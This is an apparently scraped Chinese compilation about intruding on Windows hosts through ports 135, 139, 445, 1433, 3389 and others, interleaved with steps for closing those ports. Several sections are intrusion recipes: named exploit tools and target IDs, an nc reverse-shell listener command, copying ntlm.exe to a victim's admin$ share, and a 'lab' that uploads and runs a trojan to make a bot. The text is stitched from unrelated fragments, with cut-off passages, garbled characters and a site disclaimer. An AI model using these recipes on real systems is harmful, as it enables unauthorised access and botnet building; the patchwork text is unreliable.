关于135端口实战入侵&安全防御
各个端口的入侵方法(入侵菜鸟必看)
各个端口的入侵方法(入侵菜鸟必看)1. 1433端口入侵scanport.exe 查有1433的机器SQLScanPass.exe 进行字典暴破(字典是关键)最后SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口(以上反向的,测试成功)sqlhelloz.exe 入侵ip 1433 (这个是正向连接)2. 4899端口入侵用4899过滤器.exe,扫描空口令的机器3. 3899的入侵对很早的机器,可以试试3389的溢出(win3389ex.exe)对2000的机器,可以试试字典暴破。
(tscrack.exe)4. 80入侵对sp3以前的机器,可以用webdav入侵;对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)可以利用SQL进行注入。
(小榕的注入软件)。
5. serv-u入侵(21端口)对5. 004及以下系统,可用溢出入侵。
(serv5004.exe)对5.1.0.0及以下系统,可用本地提升权限。
(servlocal.exe)======================================对serv-u的MD5加密密码,可以用字典暴破。
(crack.vbs)输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。
如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A6. 554端口用real554.exe入侵。
7. 6129端口用DameWare6129.exe入侵。
8. 系统漏洞利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。
9. 3127等端口可以利用doom病毒开的端口,用nodoom.exe入侵。
如何防范135,445端口入侵
4.关闭IPS$
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentConteolset \ Control \ Lsa项,找到restrictanonymous键值,将键值设为1。
5.自定义安全策略
执行"开始-控制面板-管理工具-本地安全策略"在打开的"本地安全设置"窗口中选"IP安全策略 在本地计算机" 在窗口右边空白处单击鼠标右键,选'创建IP安全策略"在弹出的向导中单击"下一步",然后在名称一栏中输入"阻止危险的端口",再单击"下一步"取消对"激活默认响应规则"的选中. 单击"下一步"-"完成" 在"阻止危险端口 属性"对话框中取消对"使用添加向导"的勾选. 单击"添加" 在"新规则属性"对话框中单击"添加"按钮 弹出"IP筛选器列表" 取消对"使用添加向导"的勾选. 单击"添加",在"寻址"页面的"源地址"中选择"任何IP地址",在"目标地址"中选"我的IP地址" 切换到"协议"选项卡在协议类型中选"TCP",然后在"到此端口"中输入"135" 单击"确定"按钮返回"IP筛选器列表"重复以上步骤为其他需要关闭的窗口建立相应的筛选器.完成后单击"确定"在"新规则属性"窗口中选中"新IP筛选器列表" 切换到"筛选器操作"选项卡取消对"使用添加向导"的勾选 然后单击"添加"在"新筛选器操作属性"窗口的"安全措施"选项卡中选择"阻止" 点"确定"返回"新规则属性"选中"新筛选器操作"后,单击"关闭" 在"阻止危险的端口属性"中选"新IP筛选器列表" 关闭,返回"本地安全设置"用鼠标右键单击"阻止危险的端口"在弹出的菜单中选"指派'命令 除了135 445外,其实还有危险的端口:TCP中的135 445 593 1025 3389 UDP中的135 139 445
屏蔽135 139 445 3389端口的方法以及网络端口安全防护技巧
屏蔽135 139 445 3389端口的方法以及网络端口安全防护技巧默认情况下,Windows有很多端口是开放的,在你上网的时候,网络病毒和黑客可以通过这些端口连上你的电脑。
为了让你的系统变为铜墙铁壁,应该封闭这些端口,主要有:TCP 135、139、445、593、1025 端口和UDP 135、137、138、445 端口,一些流行病毒的后门端口(如TCP 2745、3127、6129 端口),以及远程服务访问端口3389。
下面介绍如何在WinXP/2000/2003下关闭这些网络端口:第一步,点击“开始”菜单/设置/控制面板/管理工具,双击打开“本地安全策略”,选中“IP 安全策略,在本地计算机”,在右边窗格的空白位置右击鼠标,弹出快捷菜单,选择“创建IP 安全策略”(如右图),于是弹出一个向导。
在向导中点击“下一步”按钮,为新的安全策略命名;再按“下一步”,则显示“安全通信请求”画面,在画面上把“激活默认相应规则”左边的钩去掉,点击“完成”按钮就创建了一个新的IP 安全策略。
第二步,右击该IP安全策略,在“属性”对话框中,把“使用添加向导”左边的钩去掉,然后单击“添加”按钮添加新的规则,随后弹出“新规则属性”对话框,在画面上点击“添加”按钮,弹出IP筛选器列表窗口;在列表中,首先把“使用添加向导”左边的钩去掉,然后再点击右边的“添加”按钮添加新的筛选器。
第三步,进入“筛选器属性”对话框,首先看到的是寻址,源地址选“任何IP 地址”,目标地址选“我的IP 地址”;点击“协议”选项卡,在“选择协议类型”的下拉列表中选择“TCP”,然后在“到此端口”下的文本框中输入“135”,点击“确定”按钮(如左图),这样就添加了一个屏蔽TCP 135(RPC)端口的筛选器,它可以防止外界通过135端口连上你的电脑。
点击“确定”后回到筛选器列表的对话框,可以看到已经添加了一条策略,重复以上步骤继续添加TCP 137、139、445、593 端口和UDP 135、139、445 端口,为它们建立相应的筛选器。
Kylin的端口入侵记(一)
kylin通过135端口完成了一次入侵,可是还有一些密码复杂的电脑该怎么办呢?敬请期待kylin的下一次入侵。
NTSCAN也叫变态扫描器,因为它扫描速度极快,功能比较专一。在上面勾选“主机文件”,并点击“打开”选择他刚才得到的扫描结果,将扫描方式改为WMI,端口改为135,即可开始扫描了。等待两分钟,一个个可爱诱人的IP就显示了出来。
由于很多电脑都是重装过系统的,一般都没有密码,账户也是默认的administrator,这为kylin的入侵提供了很多便利。NTSCAN自身的功能并不多,所以kylin需要再利用另一款工具来进行下一步的入侵。Kylin从他那万恶的工具包中取出了Recton,使用Recton,只要你有一远程主机的管理员密码,并且远程主机的135端口和WMI服务都开启,那么你就可以通过这个小程序远程控制对方电脑。
135端口入侵该怎么防御
从入侵的过程中我们发现,弱口令和135端口是必经之路。简单的防御就是把Windows的管理员密码改得复杂一些,高级的防御手段就是关闭135端口。关闭135端口在XP系统下比较容易。依次打开网络连接中的“本地连接→属性”→打开Internet协议(tcp/ip)属性,选择“高级TCP/IP设置→TCP/IP筛选→属性”,打开TCP/IP筛选即可。
Windows7中有些麻烦,首先运行SECPOL.MSC,选IP安全策略。然后在IP安全策略右面窗口右键点击创建IP安全策略,点击下一步,出现创建窗口,然后,凡是以后步骤看到有使用“添加向导”的都取消,全手动创建。在策略属性上点添加,会出现新规则属性,里面有IP筛选器列表,在IP筛选器列表的页面上点“添加”,在新出现窗口里填写名称,然后点“添加”(图2)。
黑客攻防案例精选.0012
1.让烦人的弹出窗口永远消失
AtGuard 可以禁止页面中的广告条和弹出窗 口。在设置窗口中可以看出它能够阻止GIF阻止 动画效果、屏蔽页面中的广告条等。
如果将快捷栏的不同框打上钩, AtGuard 便会:自动拦截网页的广告数据流、自动禁止 Cookies、开启atGurad的防火墙功能。 有时候当你打开页面的时候会有子窗口弹 出,这些弹出的窗口大多是一些广告条之类的无 用信息。若是只打开一个还好办些,手工关闭即 可,但一些站点偏偏会弹出N个窗口,让你手忙 脚乱,应接不暇,运气不好的话还会因此而导致 死机和系统崩溃!AtGuard也就集成了去除广告 弹出窗口的功能,可以在上网的时候不被这些弹
114
小知识
分布式对象模型 (DCOM) 是一种能够使 软件组件通过网络直接进行通信的协议。 DCOM以前叫做“网络 OLE”,它能够跨越包 括Internet协议(例如 HTTP)在内的多种网络 传输。可以从以下网站查阅有关 DCOM 的详 细信息:/com/tech/ dcom.asp。
德罗巴——网络炸弹与暴力攻击 CHAPTER 05
接着再来介绍一下压缩包中的rpc_locator.exe 工具,一个控制台模式下速度超快的 rpc 漏洞专 扫工具。使用命令格式如下: rpc_locator IPAddress-Start IPAddress-End 命令使用后,立即就可以看到效果。 20 Windows 2000 SP1 (Japanese) 21 Windows 2000 SP2 (Japanese) 22 Windows 2000 SP0 (Korean) 23 Windows 2000 SP1 (Korean) 24 Windows 2000 SP2 (Korean) 25 Windows 2000 SP0 (MX) 26 Windows 2000 SP1 (Mx) 这里举个例子来说吧,比如要攻击一个IP地 址为127.0.0.1的英文版Windows 2000 SP4操作系 统,输入下图中的命令。 下面来看看攻击方法,这里使用了 cndcom. exe这款RPC 溢出程序,针对几乎所有版本,使 用格式如下: cndcom <Target ID> <Target IP> 对应的类型ID如下: 0Windows 2000 SP0 (English) 1Windows 2000 SP1 (English) 2Windows 2000 SP2 (English) 3Windows 2000 SP3 (English) 4Windows 2000 SP4 (English) 5Windows XP SP0 (English) 6Windows XP SP1 (English) 7Windows NT SP5 (Chinese) 8Windows NT SP6 (Chinese) 9Windows NT SP6 (Chinesebig5) 10 Windows 2000 SP0 (Chinese) 11 Windows 2000 SP1 (Chinese) 12 Windows 2000 SP2 (Chinese) 13 Windows 2000 SP2 add(Chinese) 14 Windows 2000 SP3 (Chinese) 15 sp3) 16 Windows 2000 SP4 (okChinese) 17 Windows 2000 SP4 add(Chinese) 18 Windows XP SP1 (Chinese) 19 Windows 2000 SP0 (Japanese)
135端口入侵
我们先确定一台存在139端口漏洞的主机。用扫描工具扫描!比如SUPERSCAN这个端口扫描工具。假设现在我们已经得到一台存在139端口漏洞的主机,我们要使用nbtstat -a IP这个命令得到用户的情况!现在我们要做的是与对方计算机进行共享资源的连接。
用到两个NET命令,下面就是这两个命令的使用方法
\\computபைடு நூலகம்rname\sharename服务器及共享资源的名称。?
password访问共享资源的密码。?
*提示键入密码。 /user指定进行连接的另外一个用户。?
domainname指定另一个域。?
username指定登录的用户名。?
/home将用户连接到其宿主目录?
用4899过滤器.exe,扫描空口令的机器
3:80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入。(啊D的注入软件)。
4:serv-u入侵(21端口)
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这
端口漏洞:相信去年很多Windows 2000和Windows XP用户都中了“冲击波”病毒,该病毒就是利用RPC漏洞来攻击计算机的。RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞,该漏洞是由于错误地处理格式不正确的消息造成的。该漏洞会影响到RPC与DCOM之间的一个接口,该接口侦听的端口就是135。
135端口入侵
实验5 135端口入侵一、实验目的通过这项实验旨在使学生对135端口入侵有一定的了解,提高同学们的安全意识,掌握配置安全系统的能力。
二、实验任务任务性质:黑客攻防三、任务描述:扫描局域网中开放的135端口,运用工具,开启telnet服务,登录对方主机,放入木马。
四、任务步骤:(1)用x-san扫描主机,发现开启135端口主机;(2)用ntscan扫描开启135端口主机,telnet登录密码是否为空;(3)发现telnet登录密码为空的主机,用recov启动telnet服务;(4)建立ftp服务器,将木马放入ftp服务器;(5)通过telnet登录ftp服务器,将木马上传上目标主机,并运行;(6)肉鸡完成。
五、总结关闭135端口,445端口,139端口,3389端口的方法。
端口关闭前查看开启端口:1、关闭445端口经过注册表更改[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\NetBT\Parameters][HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\NetBT\Parameters]在“Parameters”项上,右键单击,选择“新建”——“DWORD值”。
将DWORD值命名为“SMBDeviceEnabled”。
右键单击“SMBDeviceEnabled”值,选择“修改”。
在“数值数据”下,输入“0”,单击“确定”按钮。
2、关闭135端口经过注册表更改(1)在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole] 项中把EnableDCOM的值改为“N”(2)在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc] 项中把DCOM Protocols 键值中删除“ncacn_ip_tcp”(3)停用“Distributed Transaction Coordinator”服务3、关闭3389 端口(1)在我的电脑上点右键选属性-->远程,将里面的远程协助和远程桌面两个选项框里的勾去掉(2)找到这个服务“Terminal Services”并关闭该服务4、关闭139端口、(1)右击网络邻居——属性,打开本地连接属性,在属性窗口的“常规”选项卡中选择“Internet协议(TCP/IP)”;(2)单击“属性”按钮,在打开的窗口中,单击“高级”按钮;卡,“NetBIOS设置”下,选择“禁用TCP/IP上的NetBIOS。
不同端口的入侵方法
21端口是默认的FTP端口,利用方式:弱口令探测/溢出
目前我还没看到远程溢出的,SERU的本地溢出漏洞风靡一时,曾经很多SSH远程登录协议,利用方式:弱口令探测
23端口
23端口是TLENET的默认端口,利用方式:弱口令探测/溢出
135端口
135端口提供查询服务。利用方式:IPC$(Internet Process Connection)入侵。
网上教程非常多,不多说了。
137端口
137端口统共NetBIOS 数据报(UDP)服务。
139端口
139端口提供共享资源服务(NetBios-SSN),用在IPC$入侵中。上面这三个端口可以综合利用。
端口:7
服务:Echo
说明:能看到许多人搜索Fraggle放大器时,发送到X.X.X.0和X.X.X.255的信息。
端口:19
服务:Character Generator
说明:这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。
端口:80
服务:HTTP
说明:用于网页浏览。木马Executor开放此端口。
端口:99
服务:metagram Relay
说明:后门程序ncx99开放此端口。
端口:102
服务:Message transfer agent(MTA)-X.400 over TCP/IP
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
无论是高手还是菜鸟,大家都知道常见的高危端口:135,139,3389,445等。
大家唯恐不能快点关闭这些端口以及相应的服务来保证系统的安全。
其实本人认为这是错误的,黑客技术是建立在攻与防之间的,下面看本人的135实战原理分析,以及135端口的安全防御!
一,工具攻防
现在在网上,有很多的135抓鸡器,都是全自动的,利用135端口往往能抓很多肉鸡,为什么呢?因为正版系统为了性能都是开启这些高危服务的,而用户是新手或者安全意识不强的话,就不会关闭这些东西,他们也不懂这些,所以就被抓了。
我们从工具的抓鸡过程来分析!
图一
这是一款典型的135抓鸡器,下面我们来分析一下抓鸡的过程,从攻击的方面来防御!首先扫描,筛选开启135端口的机器,这些都是很普通的。
下面开始扫描弱口令了,从反面的角度来说,135端口入侵需要弱口令(弱口令就是保护强度很弱的密码,比如123)。
接着看溢出,溢出是利用下载马的形式。
实战:
1,扫描135端口,然后筛选出弱口令等。
2,启动ftp或者是tftp本地服务器,开启服务,将木马设置放进目录
3,按照步骤批量溢出,在此填入你的电脑,以及改变相应的设置
图二
防御在下面的文章说。
二手动入侵
手动入侵是最爽的了,用工具不如手工的灵活。
这样我们就要详细分析下135端口了!我们打开管理,查看服务。
图三
众所周知,135端口的服务是RPC。
看RPC的说明,似乎毫无头绪,是的根本看不明白。
下面就说下使用的方法。
在这里,入侵的常见步骤是:
1,确定目标
2,扫描端口,假设开启了135端口
3,开启需要的漏洞服务,比如IPC共享或者telnet
我们开始实战!
通过上面的描述,作为终结点映射程序和com服务控制管理器使用。
意思就是远程控制电脑的服务。
那这样,我们就连接到远程电脑的服务控制台。
打开服务管理器,在上面点击操作,点击连接到另一台电脑。
图四
图五
图六
连接成功后,我们就可以像本地电脑一样控制服务了。
当然,再重复一遍连接的条件!
1,开启135端口也就是RPC服务
2,你知道远程电脑的用户名和密码以及修改的权限(或者远程电脑弱口令)
这时,我们就可以开启telnet服务,或者其他你需要入侵利用的服务。
剩下的就不多说了,既然开启了漏洞服务,剩下的就简单了。
三防御
这就是135端口的工具和手工的入侵战,下面我们来分析如何防御135端口的入侵!
1,从上面的入侵过程来看,弱口令是一个必不可少的过程,因此,我们设置强有力的密码,无法让对方轻易破解的话,对方也是无法连接到你的电脑的!
2,既然是端口,我们可以设置防火墙来阻挡端口
图七
3,我们同样也可以通过设置TCP/IP端口属性来防御。
依次打开开始》控制面板》网络连接》本地连接》属性》打开Internet协议(tcp/ip)属性》高级》高级TCP/IP设置》选项》TCP/IP筛选》属性》打开TCP/IP筛选。
如图8
防御就是从这几个方面来说的,注意在vista中没有这个功能!
有人会说了,这样的话,还不如直接结束了RPC服务算了,本人要说的就是这个!仔细看看RPC服务的说明。
其实有众多的程序和服务依赖于RPC服务。
这样的话,结束了RPC服务,就会使系统运行变得很慢。
所以要是防治好的话,其实不用关闭RPC服务的。
推荐的话,还是不要关比较好,本人的就一直没有关闭。